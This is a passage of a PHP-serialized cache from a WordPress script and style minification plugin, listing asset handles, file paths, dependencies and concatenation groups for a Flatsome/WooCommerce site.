footer";s:5:"order";i:4;s:5:"group";s:16:"SFSIPLUSCustomJs";}s:5:"utils";a:8:{s:6:"handle";s:5:"utils";s:3:"src";s:27:"wp-includes/js/utils.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:5:"utils";}s:12:"user-profile";a:8:{s:6:"handle";s:12:"user-profile";s:3:"src";s:31:"wp-admin/js/user-profile.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:3:{i:0;s:6:"jquery";i:1;s:23:"password-strength-meter";i:2;s:7:"wp-util";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:23:"password-strength-meter";}s:19:"flatsome-isotope-js";a:8:{s:6:"handle";s:19:"flatsome-isotope-js";s:3:"src";s:58:"wp-content/themes/flatsome/assets/libs/isotope.pkgd.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:19:"jquery-ui-draggable";}s:38:"easy-google-fonts-customize-preview-js";a:8:{s:6:"handle";s:38:"easy-google-fonts-customize-preview-js";s:3:"src";s:67:"wp-content/plugins/easy-google-fonts/assets/js/customize-preview.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:17:"customize-preview";}s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:5:"json2";}s:12:"mediaelement";a:8:{s:6:"handle";s:12:"mediaelement";s:3:"src";s:58:"wp-includes/js/mediaelement/mediaelement-and-player.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:19:"jquery-ui-draggable";}s:15:"wp-mediaelement";a:8:{s:6:"handle";s:15:"wp-mediaelement";s:3:"src";s:50:"wp-includes/js/mediaelement/wp-mediaelement.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:12:"mediaelement";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:19:"jquery-ui-draggable";}s:18:"jquery-ui-position";a:8:{s:6:"handle";s:18:"jquery-ui-position";s:3:"src";s:40:"wp-includes/js/jquery/ui/position.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:6:"jquery";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}s:11:"jquery-qtip";a:8:{s:6:"handle";s:11:"jquery-qtip";s:3:"src";s:67:"wp-content/plugins/ninja-forms/deprecated/js/min/jquery.qtip.min.js";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:2:{i:0;s:6:"jquery";i:1;s:18:"jquery-ui-position";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:29:"flatsome-theme-woocommerce-js";}}s:6:"styles";a:55:{s:18:"dp-template-editor";a:9:{s:6:"handle";s:18:"dp-template-editor";s:3:"src";s:91:"wp-content/plugins/displayProduct/admin/./assets/css/template-editor/dp-template-editor.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:14:"contact-form-7";a:9:{s:6:"handle";s:14:"contact-form-7";s:3:"src";s:57:"wp-content/plugins/contact-form-7/includes/css/styles.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:18:"disclaimer-manager";a:9:{s:6:"handle";s:18:"disclaimer-manager";s:3:"src";s:92:"wp-content/plugins/disclaimer-and-notification-manager-for-authors/dm-disclaimer-manager.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:8:"magnific";a:9:{s:6:"handle";s:8:"magnific";s:3:"src";s:62:"wp-content/plugins/displayProduct/plugin/magnific/magnific.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:12:"dp_quickview";a:9:{s:6:"handle";s:12:"dp_quickview";s:3:"src";s:69:"wp-content/plugins/displayProduct/plugin/magnific/magnific-custom.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:28:"pc_google_analytics-frontend";a:9:{s:6:"handle";s:28:"pc_google_analytics-frontend";s:3:"src";s:62:"wp-content/plugins/pc-google-analytics/assets/css/frontend.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:23:"decision_tree_jquery_ui";a:9:{s:6:"handle";s:23:"decision_tree_jquery_ui";s:3:"src";s:59:"//code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css";s:3:"min";b:0;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:17:"ignored in header";s:5:"order";i:3;s:5:"group";s:23:"decision_tree_jquery_ui";s:5:"media";s:3:"all";}s:24:"decisiontree_local_style";a:9:{s:6:"handle";s:24:"decisiontree_local_style";s:3:"src";s:69:"wp-content/plugins/sidecar-decision-tree/decisiontree_local_style.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:19:"prefix-font-awesome";a:9:{s:6:"handle";s:19:"prefix-font-awesome";s:3:"src";s:69:"//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.min.css";s:3:"min";b:0;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:17:"ignored in header";s:5:"order";i:3;s:5:"group";s:19:"prefix-font-awesome";s:5:"media";s:3:"all";}s:13:"social-widget";a:9:{s:6:"handle";s:13:"social-widget";s:3:"src";s:56:"wp-content/plugins/social-media-widget/social_widget.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:15:"SFSIPLUSmainCss";a:9:{s:6:"handle";s:15:"SFSIPLUSmainCss";s:3:"src";s:64:"wp-content/plugins/ultimate-social-media-plus/css/sfsi-style.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:25:"ywtm-icon-retinaicon-font";a:9:{s:6:"handle";s:25:"ywtm-icon-retinaicon-font";s:3:"src";s:94:"wp-content/plugins/yith-woocommerce-tab-manager-premium/assets/fonts/retinaicon-font/style.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"yith_wcas_frontend";s:5:"media";s:3:"all";}s:17:"ywtm-font-awesome";a:9:{s:6:"handle";s:17:"ywtm-font-awesome";s:3:"src";s:87:"wp-content/plugins/yith-woocommerce-tab-manager-premium/assets/css/font-awesome.min.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"yith_wcas_frontend";s:5:"media";s:3:"all";}s:16:"jquery-selectBox";a:9:{s:6:"handle";s:16:"jquery-selectBox";s:3:"src";s:76:"wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:17:"ywtm-font-awesome";s:5:"media";s:3:"all";}s:19:"flatsome-ninjaforms";a:9:{s:6:"handle";s:19:"flatsome-ninjaforms";s:3:"src";s:69:"wp-content/themes/flatsome/inc/integrations/ninjaforms/ninjaforms.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"yith_wcas_frontend";s:5:"media";s:3:"all";}s:29:"flatsome-woocommerce-wishlist";a:9:{s:6:"handle";s:29:"flatsome-woocommerce-wishlist";s:3:"src";s:73:"wp-content/themes/flatsome/inc/integrations/wc-yith-wishlist/wishlist.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:17:"ywtm-font-awesome";s:5:"media";s:3:"all";}s:17:"multipleSelectCss";a:9:{s:6:"handle";s:17:"multipleSelectCss";s:3:"src";s:69:"wp-content/plugins/product-enquiry-pro/css/public/multiple-select.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:18:"quoteup_responsive";a:9:{s:6:"handle";s:18:"quoteup_responsive";s:3:"src";s:70:"wp-content/plugins/product-enquiry-pro/css/public/responsive-style.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:25:"ywtm-icon-retinaicon-font";s:5:"media";s:3:"all";}s:13:"flatsome-main";a:9:{s:6:"handle";s:13:"flatsome-main";s:3:"src";s:50:"wp-content/themes/flatsome/assets/css/flatsome.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"yith_wcas_frontend";s:5:"media";s:3:"all";}s:13:"flatsome-shop";a:9:{s:6:"handle";s:13:"flatsome-shop";s:3:"src";s:55:"wp-content/themes/flatsome/assets/css/flatsome-shop.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"yith_wcas_frontend";s:5:"media";s:3:"all";}s:14:"flatsome-style";a:9:{s:6:"handle";s:14:"flatsome-style";s:3:"src";s:36:"wp-content/themes/flatsome/style.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"yith_wcas_frontend";s:5:"media";s:3:"all";}s:16:"flatsome-effects";a:9:{s:6:"handle";s:16:"flatsome-effects";s:3:"src";s:49:"wp-content/themes/flatsome/assets/css/effects.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:16:"flatsome-effects";s:5:"media";s:3:"all";}s:9:"dashicons";a:9:{s:6:"handle";s:9:"dashicons";s:3:"src";s:34:"/wp-includes/css/dashicons.min.css";s:3:"min";b:0;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:17:"ignored in footer";s:5:"order";i:5;s:5:"group";s:9:"dashicons";s:5:"media";s:3:"all";}s:9:"admin-bar";a:9:{s:6:"handle";s:9:"admin-bar";s:3:"src";s:34:"/wp-includes/css/admin-bar.min.css";s:3:"min";b:0;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:9:"dashicons";}s:8:"position";s:17:"ignored in header";s:5:"order";i:3;s:5:"group";s:9:"admin-bar";s:5:"media";s:3:"all";}s:18:"yoast-seo-adminbar";a:9:{s:6:"handle";s:18:"yoast-seo-adminbar";s:3:"src";s:65:"wp-content/plugins/wordpress-seo-premium/css/adminbar-340.min.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"yith_wcas_frontend";s:5:"media";s:3:"all";}s:23:"yit-tabmanager-frontend";a:9:{s:6:"handle";s:23:"yit-tabmanager-frontend";s:3:"src";s:96:"wp-content/plugins/yith-woocommerce-tab-manager-premium/assets/css/yith-tab-manager-frontend.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"yith_wcas_frontend";s:5:"media";s:3:"all";}s:10:"modal_css1";a:9:{s:6:"handle";s:10:"modal_css1";s:3:"src";s:60:"wp-content/plugins/product-enquiry-pro/css/wdm-bootstrap.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:10:"modal_css1";s:5:"media";s:3:"all";}s:18:"wdm-mini-cart-css2";a:9:{s:6:"handle";s:18:"wdm-mini-cart-css2";s:3:"src";s:53:"wp-content/plugins/product-enquiry-pro/css/common.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:10:"modal_css1";s:5:"media";s:3:"all";}s:17:"wdm-quoteup-icon2";a:9:{s:6:"handle";s:17:"wdm-quoteup-icon2";s:3:"src";s:70:"wp-content/plugins/product-enquiry-pro/css/public/wdm-quoteup-icon.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:10:"modal_css1";s:5:"media";s:3:"all";}s:7:"buttons";a:9:{s:6:"handle";s:7:"buttons";s:3:"src";s:31:"wp-includes/css/buttons.min.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:5:"forms";a:9:{s:6:"handle";s:5:"forms";s:3:"src";s:26:"wp-admin/css/forms.min.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:4:"l10n";a:9:{s:6:"handle";s:4:"l10n";s:3:"src";s:25:"wp-admin/css/l10n.min.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:5:"login";a:9:{s:6:"handle";s:5:"login";s:3:"src";s:26:"wp-admin/css/login.min.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:4:{i:0;s:9:"dashicons";i:1;s:7:"buttons";i:2;s:5:"forms";i:3;s:4:"l10n";}s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:29:"nextend_fb_connect_stylesheet";a:9:{s:6:"handle";s:29:"nextend_fb_connect_stylesheet";s:3:"src";s:68:"wp-content/plugins/nextend-facebook-connect/buttons/facebook-btn.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:7:"select2";a:9:{s:6:"handle";s:7:"select2";s:3:"src";s:53:"wp-content/plugins/woocommerce/assets/css/select2.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:7:"select2";s:5:"media";s:3:"all";}s:15:"ux-builder-core";a:9:{s:6:"handle";s:15:"ux-builder-core";s:3:"src";s:62:"wp-content/themes/flatsome/assets/css/builder/core/content.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:25:"ywtm-icon-retinaicon-font";s:5:"media";s:3:"all";}s:19:"ux-builder-flatsome";a:9:{s:6:"handle";s:19:"ux-builder-flatsome";s:3:"src";s:64:"wp-content/themes/flatsome/assets/css/builder/custom/builder.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:25:"ywtm-icon-retinaicon-font";s:5:"media";s:3:"all";}s:19:"dp-frontend-default";a:9:{s:6:"handle";s:19:"dp-frontend-default";s:3:"src";s:56:"wp-content/plugins/displayProduct/assets/css/default.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:19:"dp-frontend-default";s:5:"media";s:3:"all";}s:15:"dp-frontend-col";a:9:{s:6:"handle";s:15:"dp-frontend-col";s:3:"src";s:67:"wp-content/plugins/displayProduct/assets/css/responsivegrid/col.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:19:"dp-frontend-default";s:5:"media";s:3:"all";}s:30:"dp-frontend-grid-default-style";a:9:{s:6:"handle";s:30:"dp-frontend-grid-default-style";s:3:"src";s:66:"wp-content/plugins/displayProduct/assets/css/grid/grid-default.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:19:"dp-frontend-default";s:5:"media";s:3:"all";}s:18:"dp-frontend-button";a:9:{s:6:"handle";s:18:"dp-frontend-button";s:3:"src";s:62:"wp-content/plugins/displayProduct/assets/css/button/button.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:19:"dp-frontend-default";s:5:"media";s:3:"all";}s:22:"dp-frontend-pagination";a:9:{s:6:"handle";s:22:"dp-frontend-pagination";s:3:"src";s:60:"wp-content/plugins/displayProduct/assets/css/paginations.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:19:"dp-frontend-default";s:5:"media";s:3:"all";}s:18:"dp-frontend-sorter";a:9:{s:6:"handle";s:18:"dp-frontend-sorter";s:3:"src";s:55:"wp-content/plugins/displayProduct/assets/css/sorter.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:19:"dp-frontend-default";s:5:"media";s:3:"all";}s:33:"dp-frontend-hoverex-templates-css";a:9:{s:6:"handle";s:33:"dp-frontend-hoverex-templates-css";s:3:"src";s:78:"wp-content/plugins/displayProduct/plugin/hoverex/template_assets/templates.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:19:"dp-frontend-default";s:5:"media";s:3:"all";}s:27:"dp-frontend-hoverex-all-css";a:9:{s:6:"handle";s:27:"dp-frontend-hoverex-all-css";s:3:"src";s:64:"wp-content/plugins/displayProduct/plugin/hoverex/hoverex-all.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in footer";s:5:"order";i:4;s:5:"group";s:19:"dp-frontend-default";s:5:"media";s:3:"all";}s:27:"flatsome-customizer-preview";a:9:{s:6:"handle";s:27:"flatsome-customizer-preview";s:3:"src";s:62:"wp-content/themes/flatsome/assets/css/admin/admin-frontend.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:17:"customize-preview";a:9:{s:6:"handle";s:17:"customize-preview";s:3:"src";s:41:"wp-includes/css/customize-preview.min.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:17:"multipleSelectCss";s:5:"media";s:3:"all";}s:18:"kirki_google_fonts";a:9:{s:6:"handle";s:18:"kirki_google_fonts";s:3:"src";s:59:"https://fonts.googleapis.com/css?family=Oswald%3A700&subset";s:3:"min";b:0;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:17:"ignored in header";s:5:"order";i:3;s:5:"group";s:18:"kirki_google_fonts";s:5:"media";s:3:"all";}s:18:"yith_wcas_frontend";a:9:{s:6:"handle";s:18:"yith_wcas_frontend";s:3:"src";s:84:"wp-content/plugins/yith-woocommerce-ajax-search/assets/css/yith_wcas_ajax_search.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"yith_wcas_frontend";s:5:"media";s:3:"all";}s:20:"wp-embed-template-ie";a:9:{s:6:"handle";s:20:"wp-embed-template-ie";s:3:"src";s:44:"wp-includes/css/wp-embed-template-ie.min.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:20:"wp-embed-template-ie";s:5:"media";s:3:"all";}s:15:"wp-color-picker";a:9:{s:6:"handle";s:15:"wp-color-picker";s:3:"src";s:33:"wp-admin/css/color-picker.min.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:28:"easy-google-fonts-chosen-css";a:9:{s:6:"handle";s:28:"easy-google-fonts-chosen-css";s:3:"src";s:58:"wp-content/plugins/easy-google-fonts/assets/css/chosen.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:32:"easy-google-fonts-customizer-css";a:9:{s:6:"handle";s:32:"easy-google-fonts-customizer-css";s:3:"src";s:62:"wp-content/plugins/easy-google-fonts/assets/css/customizer.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:18:"dp-template-editor";s:5:"media";s:3:"all";}s:12:"mediaelement";a:9:{s:6:"handle";s:12:"mediaelement";s:3:"src";s:54:"wp-includes/js/mediaelement/mediaelementplayer.min.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";b:0;s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:25:"ywtm-icon-retinaicon-font";s:5:"media";s:3:"all";}s:15:"wp-mediaelement";a:9:{s:6:"handle";s:15:"wp-mediaelement";s:3:"src";s:51:"wp-includes/js/mediaelement/wp-mediaelement.min.css";s:3:"min";b:1;s:2:"wp";b:0;s:6:"depend";a:1:{i:0;s:12:"mediaelement";}s:8:"position";s:18:"minified in header";s:5:"order";i:2;s:5:"group";s:25:"ywtm-icon-retinaicon-font";s:5:"media";s:3:"all";}}s:6:"groups";a:108:{s:51:"dp-template-editor-32f7363293be5090af2f86709e59411b";a:5:{s:6:"handle";s:51:"dp-template-editor-32f7363293be5090af2f86709e59411b";s:6:"string";s:715:"wp-content/plugins/displayProduct/admin/./assets/css/template-editor/dp-template-editor.css,wp-content/plugins/contact-form-7/includes/css/styles.css,wp-content/plugins/disclaimer-and-notification-manager-for-authors/dm-disclaimer-manager.css,wp-content/plugins/displayProduct/plugin/magnific/magnific.css,wp-content/plugins/displayProduct/plugin/magnific/magnific-custom.css,wp-content/plugins/pc-google-analytics/assets/css/frontend.css,wp-content/plugins/sidecar-decision-tree/decisiontree_local_style.css,wp-content/plugins/social-media-widget/social_widget.css,wp-content/plugins/ultimate-social-media-plus/css/sfsi-style.css,wp-content/plugins/yith-woocommerce-ajax-search/assets/css/yith_wcas_ajax_search.css";s:4:"type";s:5:"style";s:5:"order";i:0;s:4:"hash";s:32:"32f7363293be5090af2f86709e59411b";}s:58:"ywtm-icon-retinaicon-font-2b0befdaecf3e7f1274dba31b46ed59c";a:5:{s:6:"handle";s:58:"ywtm-icon-retinaicon-font-2b0befdaecf3e7f1274dba31b46ed59c";s:6:"string";s:537:"wp-content/plugins/yith-woocommerce-tab-manager-premium/assets/fonts/retinaicon-font/style.css,wp-content/plugins/yith-woocommerce-tab-manager-premium/assets/css/font-awesome.min.css,wp-content/themes/flatsome/inc/integrations/ninjaforms/ninjaforms.css,wp-content/plugins/product-enquiry-pro/css/public/multiple-select.css,wp-content/plugins/product-enquiry-pro/css/public/responsive-style.css,wp-content/themes/flatsome/assets/css/flatsome.css,wp-content/themes/flatsome/assets/css/flatsome-shop.css,wp-content/themes/flatsome/style.css";s:4:"type";s:5:"style";s:5:"order";i:1;s:4:"hash";s:32:"2b0befdaecf3e7f1274dba31b46ed59c";}s:41:"magnific-50e6f9f19c15bf96410720b0a26a844a";a:5:{s:6:"handle";s:41:"magnific-50e6f9f19c15bf96410720b0a26a844a";s:6:"string";s:309:"wp-content/plugins/displayProduct/plugin/magnific/magnific.js,wp-content/plugins/displayProduct/plugin/magnific/magnific-custom.js,wp-includes/js/zxcvbn-async.min.js,wp-content/plugins/pc-google-analytics/assets/js/frontend.min.js,wp-content/plugins/product-enquiry-pro/js/public/end-approval-quote-session.js";s:4:"type";s:6:"script";s:5:"order";i:2;s:4:"hash";s:32:"50e6f9f19c15bf96410720b0a26a844a";}s:44:"jquery-form-a60bf073b97bc9ce373806335bca7c6c";a:5:{s:6:"handle";s:44:"jquery-form-a60bf073b97bc9ce373806335bca7c6c";s:6:"string";s:660:"wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js,wp-content/plugins/contact-form-7/includes/js/scripts.js,wp-admin/js/password-strength-meter.min.js,wp-content/plugins/woocommerce/assets/js/frontend/password-strength-meter.min.js,wp-content/plugins/password-strength-for-woocommerce/js/password-strength-wc.js,wp-includes/js/jquery/ui/core.min.js,wp-content/plugins/ultimate-social-media-plus/js/shuffle/modernizr.custom.min.js,wp-content/plugins/ultimate-social-media-plus/js/shuffle/jquery.shuffle.min.js,wp-content/plugins/ultimate-social-media-plus/js/shuffle/random-shuffle-min.js,wp-content/plugins/ultimate-social-media-plus/js/custom.js";s:4:"type";s:6:"script";s:5:"order";i:3;s:4:"hash";s:32:"a60bf073b97bc9ce373806335bca7c6c";}s:47:"wc-add-to-cart-1ec39aaf13a723359312037415461984";a:5:{s:6:"handle";s:47:"wc-add-to-cart-1ec39aaf13a723359312037415461984";s:6:"string";s:678:"wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js,wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js,wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js,wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js,wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js,wp-content/plugins/yith-woocommerce-ajax-search/assets/js/yith-autocomplete.min.js,wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-search.js,wp-content/plugins/product-enquiry-pro/js/public/multiple-select.js,wp-includes/js/jquery/ui/widget.min.js,wp-includes/js/jquery/ui/mouse.min.js";s:4:"type";s:6:"script";s:5:"order";i:4;s:4:"hash";s:32:"1ec39aaf13a723359312037415461984";}s:52:"jquery-ui-draggable-cb4fa7e6c137ade8bb2d196d732151c0";a:5:{s:6:"handle";s:52:"jquery-ui-draggable-cb4fa7e6c137ade8bb2d196d732151c0";s:6:"string";s:276:"wp-includes/js/jquery/ui/draggable.min.js,wp-content/plugins/product-enquiry-pro/js/public/responsive-table.js,wp-includes/js/hoverIntent.min.js,wp-content/themes/flatsome/assets/js/flatsome.js,wp-content/themes/flatsome/assets/js/woocommerce.js,wp-includes/js/wp-embed.min.js";s:4:"type";s:6:"script";s:5:"order";i:5;s:4:"hash";s:32:"cb4fa7e6c137ade8bb2d196d732151c0";}s:58:"ywtm-icon-retinaicon-font-32ee4a442b61172b53a9e47e53cd6e79";a:5:{s:6:"handle";s:58:"ywtm-icon-retinaicon-font-32ee4a442b61172b53a9e47e53cd6e79";s:6:"string";s:603:"wp-content/plugins/yith-woocommerce-tab-manager-premium/assets/fonts/retinaicon-font/style.css,wp-content/plugins/yith-woocommerce-tab-manager-premium/assets/css/font-awesome.min.css,wp-content/plugins/wordpress-seo-premium/css/adminbar-340.min.css,wp-content/themes/flatsome/inc/integrations/ninjaforms/ninjaforms.css,wp-content/plugins/product-enquiry-pro/css/public/multiple-select.css,wp-content/plugins/product-enquiry-pro/css/public/responsive-style.css,wp-content/themes/flatsome/assets/css/flatsome.css,wp-content/themes/flatsome/assets/css/flatsome-shop.css,wp-content/themes/flatsome/style.css";s:4:"type";s:5:"style";s:5:"order";i:0;s:4:"hash";s:32:"32ee4a442b61172b53a9e47e53cd6e79";}s:49:"flatsome-effects-4f2f383e4d0a6b3a71a5b7ccc6d936fa";a:5:{s:6:"handle";s:49:"flatsome-effects-4f2f383e4d0a6b3a71a5b7ccc6d936fa";s:6:"string";s:49:"wp-content/themes/flatsome/assets/css/effects.css";s:4:"type";s:5:"style";s:5:"order";i:1;s:4:"hash";s:32:"4f2f383e4d0a6b3a71a5b7ccc6d936fa";}s:52:"jquery-ui-draggable-395fabc4112072ae1918581c68340b6b";a:5:{s:6:"handle";s:52:"jquery-ui-draggable-395fabc4112072ae1918581c68340b6b";s:6:"string";s:335:"wp-includes/js/jquery/ui/draggable.min.js,wp-content/plugins/product-enquiry-pro/js/public/responsive-table.js,wp-includes/js/hover